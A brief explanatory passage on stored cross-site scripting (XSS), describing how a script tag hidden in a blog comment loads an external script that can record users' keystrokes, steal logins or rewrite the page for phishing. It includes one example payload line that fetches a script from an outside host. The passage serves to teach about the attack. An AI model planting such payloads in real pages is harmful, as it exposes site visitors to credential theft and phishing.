The cross-site scripting Attack (Cross-site scrpting), referred to as XSS, refers to injecting a script into the DOM of pages in other domains that are visible to other users. A malicious user may attempt to exploit this vulnerability to record a user's keystrokes or actions to steal certain information from the user. In the past, sites that contained user submissions were particularly vulnerable to this vulnerability. For example, a user submits a comment in a blog and contains a script block that resembles the following code:
for Post that ... <script type= "Text/javascript" src= "Http://abc.org/aa.js" ></script>
When you browse the page, only comments are visible, but for each user who accesses the page, the browser downloads an external script for that user. In this external script you can spy on the user's login information or other screen content, or even rewrite the DOM to achieve phishing attempts.
JavaScript Cross-Site scripting attacks